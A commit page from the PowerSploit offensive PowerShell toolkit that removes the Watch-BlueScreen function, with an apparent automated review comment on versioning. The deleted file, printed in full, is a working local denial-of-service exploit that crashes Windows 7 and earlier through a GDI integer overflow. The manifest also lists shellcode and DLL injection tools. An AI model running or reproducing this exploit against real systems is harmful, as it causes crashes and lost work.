authormattifestation <mattgraeber@gmail.com>2014-06-19 20:16:26 -0400
committermattifestation <mattgraeber@gmail.com>2014-06-19 20:16:26 -0400
commit80ffa19fa37399d857ecebea1fe821f3171b7967 (patch)
treeff6380fc6d00c4d42b940f4545a4afc814f4c868
parent3444a0700e07e2471e894ce50af69552665e3fbe (diff)
downloadPowerSploit-80ffa19fa37399d857ecebea1fe821f3171b7967.tar.gz
PowerSploit-80ffa19fa37399d857ecebea1fe821f3171b7967.zip
Removing Watch-BlueScreen
This vulnerability was patched a while ago, making this function largely irrelevant.
-rw-r--r--CodeExecution/CodeExecution.psd12
-rw-r--r--CodeExecution/Watch-BlueScreen.ps178
-rw-r--r--README.md4
3 files changed, 1 insertions, 83 deletions
diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1
index 07963fc..85258a5 100644
--- a/CodeExecution/CodeExecution.psd1
+++ b/CodeExecution/CodeExecution.psd1
@@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID =
# List of all files packaged with this module
FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
- 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md'
+ 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Usage.md'
# Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = ''
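Review bot: The manifest drops a public function from the module but the version visible in this hunk's context line, `ModuleVersion = '1.0.0.0'` in the ModuleList entry, is left as-is; removing an exported command is a breaking change for anyone who imports the module by version, so I'd bump it in the same commit (the top-level ModuleVersion field is outside the hunk, so I can't confirm whether it was changed). Trimming FileList also does not by itself unload the function: if CodeExecution.psm1 dot-sources every .ps1 in the directory, a stale Watch-BlueScreen.ps1 left behind by an in-place update would still be loaded, so it is worth confirming the loader and FunctionsToExport do not reference it by name. Since the commit message justifies the removal with "patched a while ago", a short comment in the manifest or changelog naming the Windows update that closed the SetLayout/ScaleWindowExtEx issue would let future readers verify that claim without re-testing.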
diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1
deleted file mode 100644
index 0a12a91..0000000
--- a/CodeExecution/Watch-BlueScreen.ps1
+++ /dev/null
@@ -1,78 +0,0 @@
-function Watch-BlueScreen
-{
-<#
-.SYNOPSIS
-
- Cause a blue screen to occur (Windows 7 and below).
-
- PowerSploit Function: Watch-BlueScreen
- Author: Matthew Graeber (@mattifestation)
- Original Research: Tavis Ormandy and Nikita Tarakanov
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: None
-
-.NOTES
-
- Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
- ?tweeted this technique on 5/13/2013.
-
-.LINK
-
- https://gist.github.com/taviso/4658638
- http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
- https://twitter.com/NTarakanov/status/334031968465453057
-#>
- [CmdletBinding( ConfirmImpact = 'High')] Param ()
-
- try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
- {
- $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
- $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
- $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
- $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
-
- $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
- $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
- $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
- [Reflection.FieldInfo[]]@($SetLastError), @($true))
-
- $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
- 'Gdi32.dll',
- 'Public, Static',
- 'Standard',
- [IntPtr],
- @([IntPtr]),
- 'Winapi',
- 'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
-
- $TypeBuilder.DefinePInvokeMethod( 'SetLayout',
- 'Gdi32.dll',
- 'Public, Static',
- 'Standard',
- [UInt32],
- @([IntPtr], [UInt32]),
- 'Winapi',
- 'Auto' ) | Out-Null
-
- $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
- 'Gdi32.dll',
- 'Public, Static',
- 'Standard',
- [Bool],
- @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
- 'Winapi',
- 'Auto' ) | Out-Null
-
- $Gdi32 = $TypeBuilder.CreateType()
- }
-
- $LAYOUT_RTL = 1
-
- if ($psCmdlet.ShouldContinue( 'Do you want to continue?', 'You may want to save your work before continuing.' ))
- {
- $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
- $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
- $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
- }
-}
diff --git a/README.md b/README.md
index 4f4a9ba..f2967fc 100644
--- a/README.md
+++ b/README.md
@@ -20,10 +20,6 @@ Injects shellcode into the process ID of your choosing or within PowerShell loca
Execute shellcode within the context of the running PowerShell process without making any Win32 function calls.
-#### `Watch-BlueScreen`
-
-Cause a blue screen to occur (Windows 7 and below).
-
## ScriptModification
**Modify and/or prepare scripts for execution on a compromised machine.**